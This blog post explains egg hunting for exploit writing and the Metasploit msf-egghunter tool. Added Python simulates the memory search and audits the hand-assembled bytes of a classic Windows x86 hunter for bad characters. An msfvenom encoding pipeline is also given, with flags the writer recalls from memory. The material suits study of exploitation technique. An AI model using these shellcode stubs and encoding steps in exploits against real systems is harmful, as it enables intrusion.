A closer look at msf-egghunter
Egg hunting is a technique used in exploit writing to deal with evil shellcode that ends up in a memory location different from the one we are redirected to via an EIP overwrite, an SEH hijack or another mechanism.
The basic idea behind an egg hunter is that the shellcode is prepended with a 4-byte pattern (the egg) repeated twice, and a small routine searches memory for this pattern. When the pattern has been found, the routine jumps to that memory location, which then contains the shellcode we want to execute.
The egg hunting technique was introduced in the Safely Searching Process Virtual Address Space paper by Matt Miller.
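To make the search concrete, here is an added example (my own Python, not code from this post, from Miller's paper or from Metasploit) that simulates the hunter's loop over a constructed address space in which some pages are unmapped: it probes whether the current address is readable, skips a whole page when it is not, ignores a lone copy of the tag, and returns the address right after the doubled egg, which is where `jmp edi` lands after the two `scasd` instructions have advanced edi. The page size, the mapped pages and the planted bytes are all constructed values, and the 8-byte readability probe is a simplification of the per-probe system call the real stub issues.

```python
PAGE = 0x1000  # constructed page size, matching 4 KiB x86 pages


def build_memory(mapped_pages):
    """Constructed address space: only the listed page bases are readable."""
    return {base: bytearray(PAGE) for base in mapped_pages}


def _page(addr):
    return addr & ~(PAGE - 1)


def plant(memory, addr, data):
    """Write data starting at addr; the bytes may cross into the next page."""
    for i, b in enumerate(data):
        memory[_page(addr + i)][(addr + i) % PAGE] = b


def readable(memory, addr, n=8):
    """Simulated kernel probe: True if all n bytes from addr lie in mapped pages.
    Stands in for the system call the real stub issues before each compare."""
    return all(_page(addr + i) in memory for i in range(n))


def read(memory, addr, n):
    return bytes(memory[_page(addr + i)][(addr + i) % PAGE] for i in range(n))


def hunt(memory, tag, start=0, limit=0x10000):
    """Walk memory like the hunter loop and return the address the final
    'jmp edi' would land on, or None if no doubled tag exists below limit."""
    assert len(tag) == 4
    egg = tag * 2  # the marker in memory is the tag written twice
    addr = start
    while addr < limit:
        if not readable(memory, addr):
            # 'or dx, 0x0fff ; inc edx': skip to the start of the next page
            addr = (addr | (PAGE - 1)) + 1
            continue
        if read(memory, addr, 8) == egg:
            # two matching scasd moved edi past the egg; execution lands here
            return addr + 8
        addr += 1  # 'inc edx': try the next byte
    return None


def demo():
    """Constructed layout: pages 0x1000, 0x2000, 0x4000 and 0x5000 are mapped,
    0x3000 is not. A lone tag at 0x1100 (like the tag inside the hunter's own
    'mov eax' immediate) must be ignored; the real egg straddles the
    0x4000/0x5000 page boundary and is followed by four breakpoint bytes that
    stand in for the payload."""
    mem = build_memory([0x1000, 0x2000, 0x4000, 0x5000])
    plant(mem, 0x1100, b"BEEF")
    plant(mem, 0x4ffc, b"BEEFBEEF" + b"\xcc" * 4)
    landing = hunt(mem, b"BEEF")
    print(f"hunter lands at {landing:#x}, next bytes {read(mem, landing, 4).hex()}")
    return landing


if __name__ == "__main__":
    demo()
```

Running `demo()` reports a landing address of 0x5004: the lone tag at 0x1100 is passed over because the eight bytes there are not the tag twice, the unmapped 0x3000 page is skipped in one step instead of faulting, and the egg split across two mapped pages is still found.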
I wrote about egg hunting during my SLAE journey back in May 2018.
Today I want to introduce you to the msf-egghunter tool that ships with the Metasploit Framework.
Instead of writing your egg hunting routine from scratch (hint: do it at least once in order to understand how it works), you have a ready-to-use helper with your Metasploit installation.
The basic usage is to specify the platform (windows or linux) and the architecture, since the tool produces different assembler code for each. The only mandatory parameter is the egg to be used, BEEF in our case.
What about bad characters, then? According to the tool’s help message, with the ‘-b’ parameter you supply the characters to be avoided… but it doesn’t work.
My Metasploit version is 5.0.6-dev, and if I need to avoid the ‘\x66’ character in the previous example I have some trouble.
The usage combo I love most is the one with msfvenom. msfvenom is not only good for creating shellcode: it can also read code from standard input and apply some filters to it.
If we want to avoid the ‘\x66’ character in our egg hunter code, the best way to achieve it is to ask msfvenom to apply some encoding. Let’s do it this way:
We asked msf-egghunter for raw output, which we pass to msfvenom specifying the list of bad characters. After the encoder pass, we can see there is no ‘\x66’ character in our code.
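As an added example (my own Python, not code from this post, from Metasploit or from rex-exploit) of the check to run before and after the encoder pass, below is a small bad-character audit. Its sample input is the classic 32-byte Windows x86 hunter from Miller's paper, hand-assembled here with the tag w00t; it begins with `or dx, 0x0fff`, whose 16-bit operand needs the 0x66 operand-size prefix, the same byte this post has trouble avoiding. `with_tag`, `parse_badchars`, `find_badchars` and `audit` are helpers of mine; `with_tag` swaps the tag in the `mov eax` immediate, because the tag's own bytes count as code too.

```python
# Constructed sample input: the classic Windows x86 hunter from Miller's paper
# (NtAccessCheckAndAuditAlarm probe), hand-assembled with the tag "w00t".
CLASSIC_HUNTER = bytes.fromhex(
    "6681caff0f"            # or dx, 0x0fff   (0x66 = operand-size prefix)
    "42"                    # inc edx
    "52"                    # push edx
    "6a02"                  # push 2
    "58"                    # pop eax
    "cd2e"                  # int 0x2e
    "3c05"                  # cmp al, 5
    "5a"                    # pop edx
    "74ef"                  # je  loop_inc_page (back to offset 0)
    "b8" + b"w00t".hex() +  # mov eax, 'w00t'  (tag immediate at offset 18)
    "8bfa"                  # mov edi, edx
    "af"                    # scasd
    "75ea"                  # jnz loop_inc_one (back to offset 5)
    "af"                    # scasd
    "75e7"                  # jnz loop_inc_one
    "ffe7"                  # jmp edi
)
TAG_OFFSET = 18  # position of the 4-byte immediate of 'mov eax, tag'


def with_tag(tag):
    """Return the hunter with its 4-byte tag replaced (tag bytes are code too)."""
    assert len(tag) == 4
    return CLASSIC_HUNTER[:TAG_OFFSET] + tag + CLASSIC_HUNTER[TAG_OFFSET + 4:]


def parse_badchars(spec):
    """Turn an msfvenom-style '\\x00\\x66' string into bytes."""
    return bytes.fromhex(spec.replace("\\x", ""))


def find_badchars(code, badchars):
    """Return (offset, value) for every byte of code that is in badchars."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(code) if b in bad]


def audit(code, spec):
    """Print and return every forbidden byte found in code."""
    hits = find_badchars(code, parse_badchars(spec))
    if not hits:
        print("clean: no bad characters found")
    for off, b in hits:
        print(f"bad byte \\x{b:02x} at offset {off}")
    return hits


if __name__ == "__main__":
    audit(CLASSIC_HUNTER, "\\x00\\x66")  # hits the prefix byte at offset 0
    audit(with_tag(b"BEEF"), "\\x42")    # hits 'inc edx' and the 'B' of the tag
```

The first audit finds 0x66 at offset 0 only; the second shows that choosing BEEF as the egg introduces the same byte value 0x42 that `inc edx` already uses, so a bad-character list has to be checked against the finished stub, tag included. The same `find_badchars` call is the check to repeat on the bytes msfvenom emits after the encoder pass; the pipeline the post describes is of the form `msf-egghunter -p windows -a x86 -e BEEF -f raw | msfvenom -p - -a x86 --platform windows -b '\x66' -f python` (flag names as I remember them; confirm with `msf-egghunter -h` and `msfvenom -h` on your version).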
The msf-egghunter core is in the rex-exploit library by Rapid7; you can find the source code on GitHub.
Looking at the very beginning of the source code, we can read in the comments the improvements made on top of Matt Miller’s work. Very clever is the code to disable DEP on the Windows platform, written by corelanc0d3r.
Off by one
Egg hunting is a very fun technique to use in exploit development. You tell the machine to search its own memory for the code it must use to compromise itself.
The best combination is with msfvenom, to create a fancy encoded version of your egg hunter.
And you? What is your egg hunting usage when writing exploits? Do you write custom code or do you use some other tool?